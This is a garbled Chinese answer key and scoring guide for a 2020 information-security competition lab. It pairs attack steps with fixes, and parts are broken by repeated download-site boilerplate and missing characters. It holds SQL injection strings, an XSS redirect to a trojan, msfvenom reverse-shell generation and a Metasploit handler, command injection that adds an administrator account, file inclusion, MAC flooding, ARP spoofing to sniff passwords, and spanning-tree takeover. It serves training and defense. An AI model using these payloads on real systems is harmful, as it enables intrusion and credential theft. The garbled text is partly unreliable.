2020信息安全管理与评估赛项赛题与评分标准-第二阶段答案及评分标准

1、文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。任务1：SQL注入攻防（55分）1.Web访问DCST中的WebServ2003服务器，进入login.php页面，分析该页面源程序，找到提交的变量名，并截图；（5分）找到源程序：（2分）页面标题：LoginPage找到提交的变量名（3分）提供以下变量：name=usernmname=passwd2.对该任务题目1页面注入点进行SQL注入渗透测试，使该Web站点可通过任意用户名登录，并将测试过程截图；（5分）构造注入语句：1word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式

2、支持编辑，如有帮助欢迎下载支持。username：任意用户名password：含：orX=X（X为任意值）（3分）同时包含截图：1、通过任意用户名登录（截图）2、登录成功页面（截图）（2分）3.进入DCST中的WebServ2003服务器的C:AppServwww目录，找到loginAuth.php程序，使用EditPlus工具分析并修改PHP源程序，使之可以抵御SQL注入，并将修改后的PHP源程序截图；（10分）2word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。（10分）包含语句：1、selectpasswordfr

3、omuserswhereusername=$username2、if($obj-password=$password)4.再次对该任务题目1页面注入点进行渗透测试，验证此次利用该注入点对该DCST中的WebServ2003服务器进行SQL注入渗透测试无效，并将验证过程截图；（5分）同时包含截图：1、通过任意用户名登录（截图）3word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。2、登陆后，页面出现用户名不存在提示；（截图）（5分）5.Web继续访问DCST中的WebServ2003服务器，/-EmployeeInforma

4、tionQuery，分析该页面源程序，找到提交的变量名，并截图；（5分）找到源程序：（2分）4word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。找到的源程序含有页面标题：Query找到提交的变量名（3分）name=usernm6.对该任务题目5页面注入点进行渗透测试，根据输入“%”以及“_”的返回结果确定是注入点，并将测试过程截图；（5分）（2分）5word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。输入“%”，返回所有用户信息（截图）输入“_”，返

5、回所有用户信息（截图）（3分）7.通过对该任务题目5页面注入点进行SQL注入渗透测试，删除DCST中的WebServ2003服务器的C:目录下的1.txt文档，并将注入代码及测试过程截图；（5分）构造注入语句：execdelc:1.txt-（5分）8.进入DCST中的WebServ2003服务器的C:AppServwww目录，找到QueryCtrl.php程序，使用EditPlus工具分析并修改PHP源程序，使之可以抵御SQL注入渗透测试，并将修改后的PHP源程序截图；（10分）6word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎

6、下载支持。截图：在服务器场景QueryCtrl.php源程序语句：$keyWord=$_REQUESTusernm之后加入：（10分）9.再次对该任务题目5页面注入点进行渗透测试，验证此次利用注入点对该WebServer进行SQL注入渗透测试无效，并将验证过程截图。（5分）通过：execdelc:1.txt再次进行SQL注入截图；系统出现错误提示：BadKeyWord！（截图）（5分）任务2：XSS和CSRF攻防（65分）7word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。1.Web访问DCST中的WebServ2003

7、服务器，/-EmployeeMessageBoard，分析该页面源程序，找到提交的变量名，并截图；（5分）找到源程序：（2分）含有页面标题：MessageBoard找到提交的变量名：（3分）name=MessageUsernamename=message2.对该任务题目1页面注入点进行XSS渗透测试，并进入/-EmployeeMessageBoard-DisplayMessage页面，根据该页面的显示，确定是注入点，并将测试过程截图；（5分）8word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。构造注入代码：（2分）whi

8、le(1)alert(Hacker!);测试注入成功：（3分）弹出alert(Hacker!)括号中的消息；3.对该任务题目1页面注入点进行渗透测试，使/-EmployeeMessageBoard-DisplayMessage页面的访问者执行网站（）中的木马程序：，并将注入代码及测试过程截图；（5分）构造注入代码：（2分）location.href=;测试过程：（3分）9word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。名称：trojanhorse.exe发送者：4.通过IIS搭建网站（），并通过Kali生成木马程序Tr

9、ojanHorse.exe，将该程序复制到网站（）的WWW根目录下，并将搭建该网站结果截图；（5分）搭建IIS（1分）Internet信息服务：网站目录下存放：trojanhorse.exe搭建DNS（1分）10word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。正向查找区域：主机（截图）Zone：Org主机：hackerMetasploitFramework：TrojanHorse.exe生成(3分)rootbt:#Ifconfig（截图）显示KaliIP地址：截图包含：rootbt:#msfvenompwindows/

10、meterpreter/reverse_tcpLHOST=LPORT=80fexeotrojanhorse.exe5.当/-EmployeeMessageBoard-DisplayMessage页面的访问者执行网站（）中的木马程序TrojanHorse.exe以后，访问者主机需要被Kali主机远程控制，打开访问者主机的CMD.exe命令行窗口，并将该操作过程截图；（5分）11word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。MetasploitFramework：HackerReverseTcp连接客户端（2分）root

11、bt:#msfconsolemsfuseexploit/multi/handlermsfexploit(handler)setPAYLOADwindows/meterpreter/reverse_tcpPAYLOAD=windows/meterpreter/reverse_tcpmsfexploit(handler)setLHOSTLHOST=msfexploit(handler)setLPORT80LPORT=80msfexploit(handler)exploit*Startedreversehandleron*Startingthepayloadhandler.（截图中包含黄色部分）访问

12、者主机需要被Kali主机远程控制（3分）KaliMSF提示（截图）包含如下信息KaliIP：访问者主机IP：*Sendingstage(bytes)to*Meterpretersession1opened(-atmeterpreter12word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。Kali截图包含打开访问者主机的CMD.exe命令行窗口；6.进入DCST中的WebServ2003服务器的C:AppServwww目录，找到insert.php程序，使用EditPlus工具分析并修改PHP源程序，使之可以抵御XSS渗透

13、测试，并将修改后的PHP源程序截图；（10分）(10分)在服务器场景原insert.php程序语句$info=$_REQUESTmessage后加入：绿色部分，通过替换函数，通过其它字符（,(),等字符）替换字符“”均可得分；$info=str_replace(“”,”)”,$info);或$info=str_replace(“”,”,$info);或$info=str_replace(“”,”,$info);7.再次对该任务题目1页面注入点进行渗透测试，验证此次利用该注入点对该DCST中的WebServ2003服务器进行XSS渗透测试无效，并将验证过程截图；（5分）SQLServer企业管理

14、器中，Message表中info字段注入语句符号“”被替换为上一题替换后的字符；同时CommunicationMessage页面显示Content：注入语句符号“”被替换为上一题替换后的字符；（5分）8.Web访问DCST中的WebServ2003服务器，/-ShoppingHall，分析该页面源程序，找到提交的变量名，并截图；（5分）找到源程序：（2分）14word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。页面标题为：ShoppingHall找到提交的变量名：（3分）goods=keyboard&quantity=1g

15、oods=mouse&quantity=1goods=monitor&quantity=1goods=cpu&quantity=1goods=memory&quantity=1goods=dvdrom&quantity=19.对该任务题目1页面注入点进行渗透测试，使/-EmployeeMessageBoard-DisplayMessage页面的访问者向页面ShoppingProcess.php提交参数goods=cpu&quantity=999999，查看/-PurchasedGoods.php页面，并将注入代码及测试过程截图；（5分）构造注入代码：（2分）document.location=

16、.X/ShoppingProcess.php?goods=cpu&quantity=999999;15word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。WebServerIP：测试过程：（3分）截图：Goods：CPU数值大于或等于99999910.进入DCST中的WebServ2003服务器的C:AppServwww目录，找到DisplayMessage.php程序，使用EditPlus工具分析并修改PHP源程序，使之可以抵御CSRF渗透测试，并将修改后的源程序截图；（10分）截图：服务器场景DisplayMessag

17、e.php程序语句：16word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。echo“Content:”.”$obj-info”.”替换为：echo“Content:”.strip_tags（”$obj-info”）.”（10分）11.再次对该任务题目1页面注入点进行渗透测试，验证此次利用该注入点对该DCST中的WebServ2003服务器进行CSRF渗透测试无效，并将验证过程截图；（5分）（5分）得分点：直接显示代码信息，而不是将代码执行；（截图）SQLServer企业管理器中，Message表中info字段注入语句含有

18、标记；同时CommunicationMessage页面显示Content：注入语句不含有标记；17word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。任务3：命令注入与文件包含攻防（50分）1.Web访问DCST中的WebServ2003服务器，/-DisplayDirectory，分析该页面源程序，找到提交的变量名，并截图；（5分）找到源程序：（2分）页面标题：DisplayC:sDirectory找到提交的变量名：（3分）name=directory2.对该任务题目1页面注入点进行渗透测试，使页面DisplayDire

19、ctoryCtrl.php回显C:Windows目录内容的同时，对WebServer添加账号“Hacker”，将该账号加入管理员组，并将注入代码及测试过程截图；（5分）18word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。注入语句：（2分）WINDOWS|netuserHackerPssword/addWINDOWS|netlocalgroupadministratorsHacker/add测试成功：（3分）截图：含有：命令成功完成。3.进入DCST中的WebServ2003服务器的C:AppServwww目录，找到Di

20、splayDirectoryCtrl.php程序，使用EditPlus工具分析并修改PHP源程序，使之可以抵御命令注入渗透测试，并将修改后的源程序截图；（10分）（10分）19word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。包含语句：$str=|if(strstr($directory,$str)=false)4.再次对该任务题目1页面注入点进行渗透测试，验证此次利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试无效，并将验证过程截图；（5分）截图1：利用注入点对该DCST中的WebServ20

21、03服务器进行命令注入渗透测试；含有本任务第2题的命令注入语句；WINDOWS|netuserHackerPssword/addWINDOWS|netlocalgroupadministratorsHacker/add截图2：页面出现非法输入提示；含有本任务题目3修改后代码中的错误提示信息；本案例提示信息为：illegalinput！（5分）20word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。5.Web访问DCST中的WebServ2003服务器，/-DisplayUploadedsFileContent，分析该页面源

22、程序，找到提交的变量名，并截图；（5分）找到源程序：（2分）页面标题：DisplayUploadsFileContent找到提交的变量名：（3分）name=filename6.对该任务题目5页面注入点进行渗透测试，使页面DisplayFileCtrl.php回显DCST中的WebServ2003服务器访问日志文件：AppServ/Apache2.2/logs/access.log的内容，并将注入代码及测试过程截图；（5分）构造注入代码：（2分）.AppServApache2.2logsaccess.log回显DCST中的WebServ2003服务器访问日志文件：显示出AppServ/Apach

23、e2.2/logs/access.log的内容：（3分）21word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。InternetExplorer地址栏中须含有：DisplayFileCtrl.php?filename=7.进入DCST中的WebServ2003服务器的C:AppServwww目录，找到DisplayFileCtrl.php程序，使用EditPlus工具分析并修改PHP源程序，使之可以抵御文件包含渗透测试，并将修改后的源程序截图；（10分）22word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已

24、重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。（10分）包含语句：$str=.if(strstr($directory,$str)=false)8.再次对该任务题目5页面注入点进行渗透测试，验证此次利用注入点对该DCST中的WebServ2003服务器进行文件包含渗透测试无效，并将验证过程截图。（5分）截图1：利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试；输入框含有本任务题目6的注入代码：23word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。.AppServApache2.2lo

25、gsaccess.log截图2：页面出现非法输入提示；含有本任务题目7修改后代码中的错误提示信息；本案例提示信息为：illegalinput！（5分）任务4：数据窃取防护：二层攻防（45分）1.将PC1、Kali所连接端口划入与WAF同一VLAN（VLAN10），并将PC1、Kali分配与DCST服务器相同网段IP地址，使PC1、Kali、DCST中的WebServ2003服务器能够在同一个网段（VLAN10）内相互Ping通。（2分）截图：PC1、Kali、DCST同在VLAN10；（#showvlan）24word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，wo

26、rd格式支持编辑，如有帮助欢迎下载支持。VLAN10中包含的接口数=3；WebServerIP配置（与参数表中服务器场景的IP地址一致）：PC1IP地址配置（与参数表中PC1的IP地址一致）：PC3IP地址配置（与参数表中PC3的IP地址一致）：25word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。三个终端之间能够相互Ping通；在同一个窗口ping通除了本机外的2个IP地址；26word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。2.查看DCRS交

27、换机VLAN10的MAC地址表容量信息，并将DCRS交换机配置相关参数、查看命令、查看结果截图。（3分）#showmac-address-tablecountvlan10DCRS地址表空间中有可用的空间；当前地址表记录数少于地址表容量；MaxentiresTotal：16384CurrententiresTotal：该数值小于103.从Kali发起MACFlooding渗透测试，使DCRS交换机的MAC地址表溢出，使其在MAC地址表溢出的条件下，无法学习到PC1和DCST中的WebServ2003服务器的MAC地址表信息，查看DCRS交换机的MAC地址表信息，并将渗透测试过程截图。（5分）27

28、word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。Kali#macof（2分）#showmac-address-tablecountvlan10当前地址表记录数等于地址表容量；MaxentiresTotal：16384CurrententiresTotal：该数值=16384(3分)28word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。4.Kali打开wireshark，验证在DCRS交换机MAC地址表溢出的条件下，可以监听到PC1访问DCST中的

29、WebServ2003服务器的HTTP流量，并将该验证过程截图。（5分）PC1通过InternetExplorer访问；（截图）地址栏包含：服务器场景IP（匹配参数表服务器场景IP）/Kali打开wireshark，监听到PC1通过InternetExplorer访问DCST服务器场景的HTTP流量；截图：Source：PC1的IP地址（与参数表一致）Destination：服务器场景的IP地址（与参数表一致）Protocol：HTTP（5分）29word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。5.在DCRS交换机Ka

30、li所连接端口配置PortSecurity特性，阻止Kali发起MACFlooding渗透测试，验证此时DCRS交换机MAC地址表能够学习到PC1、DCST中的WebServ2003服务器的MAC地址，并将DCRS交换机相关配置信息以及验证信息截图。（8分）配置截图包含：mac-address-learningcpu-control（2分）在VLAN10每个接口全部启用如下：InterfaceEthernet1/0/Xswitchportport-security（2分）#clearmac-address-tabledynamic（2分）#showmac-address-tablecountv

31、lan10DCRS地址表空间中有可用的空间；当前地址表记录数少于地址表容量；30word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。MaxentiresTotal：16384CurrententiresTotal：该数值小于10（2分）6.在DCRS交换机配置PortSecurity特性的条件下，Kali再次打开wireshark，监听PC1访问DCST中的WebServ2003服务器流量，验证此时Kali无法监听到PC1访问DCST中的（WebServ2003服务器的HTTP流量，并将验证过程截图。7分）PC1通过Int

32、ernetExplorer访问服务器场景；（截图）地址栏包含：服务器场景IP（匹配参数表服务器场景IP）/Kali打开wireshark，监听不到PC1通过InternetExplorer访问DCST的HTTP流量；（截图）31word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。Filter：http显示报文数：空任务5：数据窃取防护：ARP攻防（45分）1.在PC1访问DCST中的WebServ2003服务器时，查看PC1和DCST中的WebServ2003服务器的ARP缓存信息，并将PC1和DCST中的WebServ2

33、003服务器的ARP缓存信息截图。（5分）PC1、WebServ2003Ipconfig/all分别显示PC1、WebServ2003的IP和MAC；PC1的IP和MAC：32word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。服务器场景的IP和MAC：PC1通过InternetExplorer访问服务器场景；（截图）地址栏包含：服务器场景IP（匹配参数表服务器场景IP）/PC1：ARP表项内容为WebServ2003的IP-WebServ2003的真实的MAC；WebServ2003：ARP表项内容为PC1的IP-PC1

34、的真实的MAC；33word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。2.在Kali对PC1进行ARPSpoofing渗透测试，使PC1无法访问DCST中的WebServ2003服务器，PC1的ARP缓存为：DCST中的WebServ2003服务器IP-Kali的MAC地址，在PC1查看被Kali毒化后的ARP缓存信息，并将该信息截图。（5分）Kali：#arpspooftPC1_IPWebServ2003_IP（过程截图）（2分）PC1：ARP表项内容为WebServ2003的IP-Kali的MAC；KaliMAC：i

35、fconfig（截图）34word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。（3分）3.在Kali对PC1和DCST中的WebServ2003服务器进行ARP中间人渗透测试，使Kali能够使用wireshark监听到PC1向DCST中的WebServ2003服务器的LoginAuth.php页面提交的登录网站用户名、密码参数，并将该渗透测试过程截图。（7分）Kali：#arpspooftPC1_IPWebServ2003_IP#arpspooftWebServ2003_IPPC1_IP#echo1/proc/sys/ne

36、t/ipv4/ip_forward（3分）PC1通过InternetExplorer访问服务器场景；（截图）地址栏包含：服务器场景IP（匹配参数表服务器场景IP）/success.php35word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。Kali打开wireshark，监听到PC1通过InternetExplorer访问DCST服务器场景的HTTP流量；（截图）截图中包含PC1通过InternetExplorer访问DCST服务器场景的用户名、密码；包含：usernm=XXX&passwd=XXX（4分）4.在DCRS

37、交换机上配置AccessManagement特性阻止Kali发起ARPSpoofing渗透测试，并将DCRS交换机该配置信息截图。（5分）36word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。配置截图包含：amenable（2分）只在连接Kali的接口配置：InterfaceEthernet1/0/Xamportammac-ip-poolMac（Kali）IP（Kali）（3分）5.在DCRS交换机上配置AccessManagement特性的条件下，再次在Kali对PC1和DCST中的WebServ2003服务器进行AR

38、PSpoofing渗透测试，此时DCRS交换机的AccessManagement特性能够阻止Kali对PC1和DCST中的WebServ2003服务器进行ARPSpoofing渗透测试，再次查看PC1和DCST中的WebServ2003服务器的ARP缓存信息，并将该信息截图。（8分）（4分）PC1：ARP表项内容为WebServ2003的IP-WebServ2003的真实的MAC；（4分）WebServ2003：ARP表项内容为37word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。PC1的IP-PC1的真实的MAC；6.

39、在DCRS交换机上删除AccessManagement技术配置，通过IPDHCPSnoopingBind特性来阻止Kali发起ARPSpoofing渗透测试，并将DCRS交换机相关配置信息截图。（7分）配置截图包含：ipdhcpsnoopingenable（1分）ipdhcpsnoopingvlan10（1分）ipdhcpsnoopingbindingenable（1分）ipdhcpsnoopingbindinguserMac（Kali）addressIP（Kali）vlan10interfaceEthernet1/0/X（Kali连接的接口）（2分）在Kali连接的接口配置：38word格式

40、支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。InterfaceEthernet1/0/Xipdhcpsnoopingbindinguser-control（2分）7.在DCRS交换机上配置IPDHCPSnoopingBind特性的条件下，再次在Kali对PC1和DCST中的WebServ2003服务器进行ARPSpoofing渗透测试，此时DCRS交换机的IPDHCPSnoopingBind特性能够阻止Kali对PC1和DCST中的WebServ2003服务器进行ARPSpoofing渗透测试，再次查看PC1和DCST中的We

41、bServ2003服务器的ARP缓存信息，并将该信息截图。（8分）（4分）PC1：ARP表项内容为WebServ2003的IP-WebServ2003的真实的MAC；（4分）WebServ2003：ARP表项内容为PC1的IP-PC1的真实的MAC；39word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。任务6：数据窃取防护：生成树攻防（40分）1.在DCRS交换机开启生成树协议，生成树协议模式为STP，DCRS交换机优先级为0，防止网络出现物理环路，显示DCRS交换机生成树协议的状态，并将该信息截屏；（5分）STP配置：

42、（2分）配置截图包含：spanning-treespanning-treemodestpspanning-treemst0priority0显示DCRS交换机生成树协议的状态:(3分)#showspanning-treeRootID：thisSwitch（必须）40word格式支持编辑，如有帮助欢迎下载支持。文档从互联网中收集，已重新修正排版，word格式支持编辑，如有帮助欢迎下载支持。2.在Kali向DCRS交换机发起TakeOverTheRootBridge渗透测试，使DCRS交换机认为Kali为RootBridge，显示DCRS交换机生成树协议的状态，并将该信息截屏；（5分）Kali：YersiniaG（截图）ClaimingRoot